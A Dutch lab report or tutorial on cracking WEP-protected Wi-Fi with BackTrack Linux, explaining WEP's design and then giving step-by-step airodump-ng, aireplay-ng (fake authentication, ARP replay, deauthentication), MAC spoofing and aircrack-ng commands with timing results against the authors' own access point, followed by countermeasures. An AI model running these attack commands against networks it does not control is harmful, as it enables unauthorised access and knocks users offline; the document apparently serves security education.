Het kraken van WEP via de BackTrack Linux distro by wgv13363

VIEWS: 286 PAGES: 16

									Inhoudstafel

1   WEP (Wired Equivalent Privacy) ................................................................. 2
1.1  Wat is WEP? ............................................................................................. 2
1.2  Hoe werkt WEP? ....................................................................................... 3

2   Hacken van WEP....................................................................................... 4
2.1  Inleiding................................................................................................... 4
2.2  Leren werken met de Back|Track Linux distro.............................................. 5
2.3  Zoeken naar draadloze netwerken met Kismet............................................. 6
2.4  Pakketjes sniffen (IVs) met airodump-ng..................................................... 7
2.5  Fake authentication attack ......................................................................... 8
2.6  Opgevangen pakketjes terug verzenden met aireplay................................... 9
2.7  DE-AUTH attack ...................................................................................... 10
2.8  Het kraken van de WEP key ..................................................................... 11
2.9  Problemen .............................................................................................. 12

3   Tegenmaatregelen .................................................................................. 13
3.1  Use WPA with a strong key ...................................................................... 13
3.2  Change the default settings on your access point....................................... 13
3.3  Update your firmware.............................................................................. 13
3.4  Network segregation ............................................................................... 13
3.5  Turn off the WLAN when not in use .......................................................... 13
3.6  Fake AP.................................................................................................. 13
3.7  Eventuele extra maatregel ....................................................................... 14

4   Conclusie................................................................................................ 15
1  WEP (Wired Equivalent Privacy)
1.1 Wat is WEP?

WEP (Wired Equivalent Privacy) is een schema dat deel uitmaakt van de IEEE 802.11
draadloze netwerkstandaard om draadloze netwerken te beveiligen. Draadloze
netwerken zijn zeer gevoelig voor hacking (Eavesdropping; letterlijk: afluisteren)
omdat ze informatie uitzenden via radiogolven.

De bedoeling achter WEP was dezelfde beveiligingsmogelijkheden te kunnen bieden
als een traditioneel netwerk (met draden). Er werden een aantal zwaktes vastgesteld
door encryptie specialisten. Zo blijkt dat iedere WEP sleutel in korte tijd te kraken
valt met een aantal softwareprogramma’s. WEP werd opgevolgd in 2003 door WPA
(Wi-Fi Protected Access) en in 2004 door WPA2. WEP is alleen geschikt voor
thuisgebruik om vreemden die gemakkelijk toegang tot iemands draadloze netwerk
(en waarschijnlijk internetverbinding) te ontzeggen.
                                         2/16
1.2 Hoe werkt WEP?

•  Van de te verzenden data wordt een CRC32-checksum berekend. Deze checksum
  wordt achter de data geplakt.
•  Het nieuwe geheel (Data + CRC32(Data)) wordt de 'plaintext' genoemd. ('Plain',
  omdat dit stuk nog niet gecodeerd is en dus gewoon leesbaar.)
•  De keystream wordt als volgt berekend: keystream = RC4(IV, sleutel).
    o IV = initiële vectoren. Dit zijn een aantal willekeurige getallen die mogen,
      maar NIET moeten (volgens de IEEE WEP-specificaties), veranderen bij elk
      nieuw verzonden pakket.
    o sleutel = een afgesproken 'wachtwoord' dat gebruikt wordt, en door beide
      NIC's op voorhand gekend is.
•  Het pakket wordt samengesteld: Eerst worden de keystream en plaintext samen
  ge-XOR'd, en vervolgens wordt de IV voor het pakketje geplakt. Dan word het
  pakket verzonden.

Kort samengevat:

  pakket = IV + XOR(data + crc32(data), RC4(IV, sleutel))
Bij WEP encryptie wordt een 64 bits of een 128 bits sleutel gebruikt. Het instellen
van WEP kan verwarrend zijn. 40 bits en 64 bits betekenen hetzelfde. WEP gebruikt
een initialization vector (IV) van 24 bits. Dit is een stuk van de sleutel die niet door
de gebruiker verzonnen wordt. De ene fabrikant zet 40 bits (64 - 24) in zijn router,
de andere 64 bits. Hetzelfde geldt voor 128 bit en 104 bit.

Netwerkkaarten die 128 bits WEP encryptie ondersteunen kunnen samenwerken met
netwerkkaarten die een 64 bits sleutel gebruiken, mits de 128 bits kaarten ook 64
bits encryptie ondersteunen.

WEP sleutels kunnen verschillende vormen hebben: ASCII of hexadecimaal.
                                           3/16
2   Hacken van WEP
2.1 Inleiding

In deze handleiding beschrijven we het kraken van WEP via de software die
beschikbaar is op de Back|Track Linux distro. We overlopen alle stappen die nodig
zijn voor het hacken, maar we schenken ook aandacht aan de uitzonderingen die wel
eens durven voorkomen. Al de stappen kan je via de console uitvoeren aangezien
het allemaal consoleapplicaties zijn en omdat dit gemakkelijker werkt op een laptop.

Onze opstelling:
  • Een draadloos accesspoint, beveiligd met 128bits WEP encryptie. Het ESSID
   wordt niet gebroadcast.
  • Een laptop met een PRISM 802.11g Wireless Adapter (3890) netwerkkaart.
   Deze heeft een Intersil PRISM GT chipset.
  • Het draadloze netwerk heeft geen gebruikers. Daarom hebben we MAC
   filtering uitstaan.

De gebruikte netwerkkaart heeft alles aan boord voor het binnendringen van een
draadloos netwerk:

Chipset  Supported by airodump for Windows  Supported by airodump for Linux  Supported by aireplay for Linux
PrismGT  YES                 FullMAC: YES           YES (driver patching recommended)
                       SoftMAC: NOT YET


Uit deze handleidingen halen we onze mosterd:
http://www.aircrack-ng.org/doku.php?id=newbie_guide
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
http://forums.remote-exploit.org/showthread.php?t=1556

De mannier die wij volgen voor het hacken van WEP, wordt op het internet ook wel
eens ‘WEP Cracking, the FBI Way’ genoemd.
                                                       4/16
2.2 Leren werken met de Back|Track Linux distro.

Voordat we kunnen beginnen is het nodig dat we met de Live CD kunnen werken.
Hier volgen enkele basis commando’s die wij gebruiken:

Commando’s     Resultaat
login: root    Inloggen. Deze gegevens kan je op het welkomstscherm
paswoord: toor   vinden.
alt+F1-F6     Switch tussen de 6 beschikbare consoles.
alt+F7       Ga naar KDE vanuit de console.
ctrl+alt+F8    Keer terug naar de console vanuit KDE.
loadkeys be-latin1 Dit stelt het toetsenbord van de console in op azerty.
          In KDE: via de Amerikaanse vlag.
xconf       Autoconfiguratie van de grafische kaart voor betere prestaties.
          We gebruiken dit niet aangezien we zonder dit commando in
          een hogere resolutie werken.
startx       BackTrack start KDE.
flux        BackTrack start fluxbox. Dit is een lichte x window manager.
leetmode      Systeeminfo op het bureaublad.
ctrl+alt+backspace Sluit de gui. (of ‘Log Out…’)
reboot       Computer opnieuw opstarten.
poweroff      Sluit de computer af.

BackTrack is een distro gebaseerd op Slax, een live CD van Slackware, die gebruikt
wordt om netwerken door te lichten. Daarom worden de netwerkonderdelen niet
automatisch geconfigureerd bij het inpluggen. Om je netwerkkaarten op te starten
via een DHCP (Dynamic Host Control Protocol) server (deze kent je automatisch een
IP toe) typ je:
dhcpcd           (gebruikt standaard eth0)
dhcpcd eth1         voor een specifieke interface.
              In dit geval de gewone netwerkkaart.
Grafisch: K -> Internet -> Set IP Address
Als alles goed is ingeplugd, kan je nu surfen.

ifconfig toont alle netwerk interfaces. Dit hebben we later ook nodig om het MAC
adres op te zoeken. (iwconfig)
eth1    Link encap:Ethernet HWaddr 00:0A:E4:4D:F6:4C
      inet addr:192.168.2.45 Bcast:192.168.2.255 Mask:255.255.255.0
      ...

Een usb-stick mounten doe je als volgt:
mount /dev/sda1 /mnt/sda1_removable
umount sda1_removable
                                        5/16
2.3 Zoeken naar draadloze netwerken met Kismet

Kismet is een 802.11 layer2 wireless network detector, sniffer en intrusion detection
system. Het werkt met elke netwerkkaart die raw monitoring (rfmon) mode
ondersteunt. Het kan 802.11b, 802.11a en 802.11g verkeer sniffen.

Kismet vindt netwerken door passief pakketjes te verzamelen. Het kan benoemde en
verborgen netwerken (deze broadcasten hun ESSID niet) ontdekken.
http://www.kismetwireless.net/documentation.shtml

Je moet je draadloze netwerkkaart in monitor mode plaatsen voordat je kismet kan
opstarten. Met de snelkoppeling in de gui is dit niet nodig.
airmon-ng start eth0       airmon-ng <start|stop> <interface> [channel]
Hiermee kan je de interface uit monitor mode halen of op een bepaald kanaal
vastzetten.

kismet    start Kismet op in de console

Te gebruiken commando’s:
m   mute sound
h   help window. Toont een venster met al de commando’s.
x/q  close window
s   sorteer de lijst van netwerken
    (dit is nodig om een bepaald netwerk te kunnen vastzetten)
L   lock channel
i   Network details
c   Toon een lijst van alle verbonden computers. Als MAC filtering geactiveerd
    is, kan je uit deze lijst een MAC adres kiezen.

Kismet toont de beschikbare netwerken. Het SSID kan nog niet gevonden worden
aangezien er geen gebruikers zijn.
We beschikken nu over het BSSID (MAC adres) en het kanaal van het accespoint.

Kismet kan IVs opvangen, maar we gaan hiervoor airodump-ng gebruiken.
Sluit Kismet.
                                         6/16
2.4 Pakketjes sniffen (IVs) met airodump-ng

Airodump-ng wordt gebruikt voor het opvangen van ruwe 802.11 frames en is in het
bijzonder geschikt voor het verzamelen van WEP IVs (initialization vectors). Het is de
bedoeling dat we deze opgevangen IVs gaan gebruiken om WEP te kraken met
aircrack-ng.

Start het programma voor het opvangen van IVs:
airodump-ng –w vangop –c 2 --ivs eth0

eth0     De naam van de draadloze netwerkkaart.
-w vangop  Plaatst de gesnifte pakketjes in een bestand vangop-01.cap. Of vangop-
       01.ivs als de parameter –i is meegegeven.     --write <prefix>
-c 2     Het programma zal enkel kanaal 2 sniffen. Dit kom je te weten met
       kismet.                       --channel <channel>
-i      Enkel de IVs opslaan. Geen overbodige data voor het kraken.    --ivs

Bovenaan het scherm staan al de beschikbare netwerken en onderaan staat een lijst
van de verbonden gebruikers. Uitleg van de kolomkoppen kan je vinden op
http://www.aircrack-ng.org/doku.php?id=airodump-ng.
                                         7/16
2.5 Fake authentication attack

Aangezien er in onze testomgeving geen gebruiker is, hebben we een MAC adres
nodig voor de volgende aanvallen, die het IVs opvangen versnellen.
http://www.aircrack-ng.org/doku.php?id=fake_authentication

Als er wel gebruikers met het netwerk verbonden zijn, dan is het beter om daar een
MAC adres van te nemen voor de volgende aanvallen. De fake authentication aanval
genereert geen ARP aanvragen.

MAC adres aan netwerkkaart toekennen. Hierdoor zullen de volgende aanvallen ook
beter verlopen. Deze stappen kan je ook gebruiken als MAC-filtering opstaat.
    ifconfig eth0 down
    ifconfig eth0 hw ether 00:11:22:33:44:55
    ifconfig eth0 up
of:
    macchanger –m 00:11:22:33:44:55 eth0

Onder Windows kan dit met Mac MakeUp.


aireplay-ng --fakeauth 0 -a 00:30:BD:C9:E6:08 -h 00:11:22:33:44:55 -e 'essidnaam' eth0

--fakeauth 0 of -1 0  naam van de aanval + delay
-a <bssid>       Access Point MAC adres
-h <smac>       Bron MAC adres
-e <essid>       ESSID

foutmelding:
    ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211
    or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled:
    run ‘ifconfig eth0 up; iwconfig eth0 mode Monitor channel <#>’
    Sysfs injection support was not found either.

Oplossing: zet de netwerkkaar in monitor mode en op het juiste kanaal.
airmon-ng start eth0 2

    14:00:08  Sending Authentication Request
    14:00:08  Authentication successful
    14:00:08  Sending Association Request
    14:00:08  Association successful :-)

Probleem: om deze aanval te kunnen doen hebben we het ESSID nodig. Dit weten
we niet. Je hebt gebruikers nodig om de aanvallen te kunnen uitvoeren en kismet of
airodump-ng zullen het ESSID ontdeken. Als er geen gebruikers zijn, moet je het
ESSID weten om WEP te hacken. Anders kan je de fake auth aanval niet uitvoeren.
                                          8/16
2.6 Opgevangen pakketjes terug verzenden met aireplay

Aireplay gaat pakketjes proberen te vangen die mogelijk IVs bevatten. Hij gaat deze
info naar de accespoint verzenden en blijft dit herhalen. Aireplay doet zich voor als
de computer waarop we later de deauth aanval uitvoeren.
We gaan een ARP request, die IVs bevat, terug verzenden.

aireplay-ng --arpreplay -b 00:30:BD:C9:E6:08 -h 00:11:22:33:44:55 eth0

--arpreplay of -3  naam van de aanval
-b         MAC adres accespoint
-h         MAC adres van een pc die met het accespoint is verbonden. Dit is
          hier het MAC adres van de fake authentication attack.
eth0        De naam van de draadloze netwerkkaart.

Voer het commando uit. Het zal zoeken naar pakketjes. De deauth aanval zal het
proces doen versnellen.

Laat dit proces draaien tot je voldoende pakketjes hebt of begin al te kraken terwijl
de pakketjes binnenstromen.
Je hebt ongeveer 250000 IVs nodig voor 40-bit WEP en meer dan 800000 voor een
104-bit sleutel. We zullen zien dat dit met minder ook gaat.
                                          9/16
2.7 DE-AUTH attack

Nu laten we aireplay-ng een deauth aanval uitvoeren. Deze aanval zal een specifieke
machine de verbinding met de accespoint laten verliezen. Deze pc zal automatisch
terug verbinding proberen te maken. Tijdens dit proces zal het een ARP pakket
verzenden. Het is de bedoeling dat we het met de vorige stap opvangen om het
opnieuw te kunnen versturen.
Tijdens het herverbinden kan je het ESSID sniffen.

aireplay-ng --deauth 5 -a 00:30:BD:C9:E6:08 -c 00:11:22:33:44:55 eth0"

--deauth 5     Het aantal keer dat de aanval moet gebeuren. Aangezien dat we
          hier niet met een echte gebruiker te maken hebben, laten we
          dit 5 keer gebeuren. Voor het ESSID te ontdekken is 1
          voldoende.
-a <bssid>     Access Point MAC adres
-c         MAC adres van de pc waartegen we de aanval uitvoeren.
eth0        De naam van de draadloze netwerkkaart.
                                        10/16
2.8 Het kraken van de WEP key

De IVs die we met airodump-ng opgevangen hebben, zullen we kraken met aircrack-
ng.

aircrack-ng -f 4 -m 00:30:BD:C9:E6:08 -n 128 capture-01.ivs

Zonder al de parameters werkt het ook, maar met de parameters kan je enkele
zaken specifiëren.
-f 4       Hiermee kan je de fudge bepalen. Standaard staat dit op 2. Hoe
         hoger de waarde, hoe hoger het bruteforce niveau zal zijn. Het
         kraken zal meer tijd vragen, maar de graad van succes ligt hoger.
-m        Hiermee kies je het netwerk dat je wil kraken. In ons geval is dit
         overbodig aangezien er maar één netwerk beschikbaar is.
-n 64      De hoeveelheid bits in de sleutel. Standaard 128.
capture-01.ivs De naam van het bestand dat gemaakt wordt door airodump-ng.
         Het .dump bestand dat door Kismet wordt aangemaakt kan ook
         worden gebruikt.
-k <korek>    attack method (1 to 17)

Enkele resultaten terwijl de IVs binnenlopen:
128bit key: 7sec 526590 IVs (fudgefactor 2; n 128)
128bit key: 28sec 596012 IVs (fudgefactor 4)
128bit key: 6sec 869600 IVs (fudgefactor 4; n 128)

128bit key, 236580 IVs: (veel minder dan de aanbevolen 800000)
parameters                tijd
-f 2 –n 128                7sec (1406 keys getest)
-f 1                   niet gevonden
-f 2 –k 1..17               5sec (593 keys getest)
-f 3                   70sec (119434 keys getest)
-f 3 –k 1..17               16sec (5246keys getest)
-f 4 –n 128                na 30 min stopgezet
128bit key, 1032675 IVs
parameters                tijd
-f 1                   6sec (122 keys getest)
-f 1 –k 1..17               6sec (122 keys getest)
-f 2                   6sec (122 keys getest)
-f 2 –k 1..17               6sec (122 keys getest)
-f 4                   6sec (122 keys getest)
-f 8                   6sec (122 keys getest)
128bit key, 1632202 IVs -> doet er steeds 10sec over (dezelfde key)

Afhankelijk van het aantal IVs dat je hebt, zijn er opties die beter werken. Een fudge
factor van 4 zorgt in de meeste gevallen voor een resultaat.
http://www.securityfocus.com/infocus/1814 voor meer info.


                                         11/16
2.9 Problemen

Hier enkele problemen die kunnen opduiken:
- geen pc verbonden met het draadloze netwerk;
- geen SSID gevonden;
- MAC filtering;
- netwerkkaart kan niet meer verbinden met een netwerk.

Als er geen pc met het netwerk is verbonden, kunnen we wel zorgen dat we aan de
WEP key geraken, maar als het SSID niet wordt gebroadcast, dan moeten we
wachten tot iemand verbinding maakt met het netwerk. Anders kunnen we het SSID
niet vinden.
Als MAC filtering op staat, dan moeten we wachten tot iemand verbind om daarna
het MAC adres te kunnen kopiëren.

Het kan zijn dat je netwerkkaart niet meer wil verbinden met een draadloos netwerk
via Linux noch Windows. In ons geval was dit op deze manier opgelost:
iwconfig eth0 mode auto essid any
De kaart bevond zich in managed mode en zat niet vast in monitor mode, maar toch
lukte het niet om een werkende verbinding tot stand te brengen.
                                       12/16
3  Tegenmaatregelen
3.1 Use WPA with a strong key
WPA is a definite improvement over WEP in providing wireless security. But the
version intended for home and SOHO use - WPA-PSK - has a weakness shared by
any passphrase security mechanism. The choice of simple, common and short
passphrases may allow your WPA-protected WLAN to be quickly compromised via
dictionary attack.

3.2 Change the default settings on your access point
Default settings (SSID, administrator password, channel) are well known and even
included as part of some WLAN attack tools.

3.3 Update your firmware
This is helpful if your AP or client doesn't currently support WPA. Many
manufacturers have newer firmware for 802.11g products that add WPA support.
You may also find this for 802.11b gear, but it's not as common. Check anyway!

3.4 Network segregation
Put your access point on a separate subnet, with a firewall separating the wireless
and internal users.

3.5 Turn off the WLAN when not in use
A $5 lamp timer from your local hardware store is a simple, but effective way to keep
your WLAN or LAN from harm while you're sleeping.

Bickers (FBI agent) also said that if you have an access point that can swap keys fast
enough, you may be able to stay ahead of an attacker. "Most likely they will get
bored and attack someone else." But for most WLAN owners, this method isn't
practical.

Bron: FBI Teaches Lesson In How To Break Into Wi-Fi Networks
http://www.compliancepipeline.com/160502612

3.6 Fake AP
If one access point is good, 53,000 must be better.
Black Alchemy's Fake AP generates thousands of counterfeit 802.11b access points.
Hide in plain sight amongst Fake AP's cacophony of beacon frames. As part of a
honeypot or as an instrument of your site security plan, Fake AP confuses
Wardrivers, NetStumblers, Script Kiddies, and other undesirables.
Fake AP is a proof of concept released under the GPL.

http://www.blackalchemy.to/project/fakeap/
                                         13/16
3.7 Eventuele extra maatregel
MAC adressen filteren is een beveiligingsmethode die vaak in combinatie met
encryptie gebruikt wordt. Een MAC adres (ook wel 'hardware adres' of 'fysiek adres'
genoemd) is een ingebakken adres dat uniek is voor elk netwerkapparaat. Het MAC
adres is een hexadecimale code van twaalf tekens, bijvoorbeeld 00-C0-26-A9-42-F7.
Deze code kan gebruikt worden om toegang tot het netwerk toe te zeggen of juist te
blokkeren. In feite is het erg gemakkelijk.

Hoe vind ik het MAC adres van mijn netwerkkaart(en)?

Ga in Windows XP 0f 2000 naar Start > Run (uitvoeren) > type 'cmd' > type 'ipconfig
/all' in de prompt. Het MAC adres staat in het lijstje achter 'physical address' of
'fysiek adres'.

MAC adressen filteren is een beveiliging die vaak bovenop encryptie gebruikt wordt.
Een combinatie van WPA TKIP met MAC adres filters is voor de thuisgebruiker een
zéér degelijke beveiliging.
                                        14/16
4  Conclusie

Onze opdracht van het kraken van WEP is geslaagd zoals je kunt zien op volgende
screenshot.
Zoals we in ons verslag al beschreven hebben, is een netwerk beveiligd met WEP
niet ideaal. Maar het is wel beter als helemaal niets. Als het mogelijk is, gebruik dan
WPA in plaats van WEP.
                                          15/16
http://creativecommons.org/licenses/by-sa/3.0/deed.nl
                            16/16

								
To top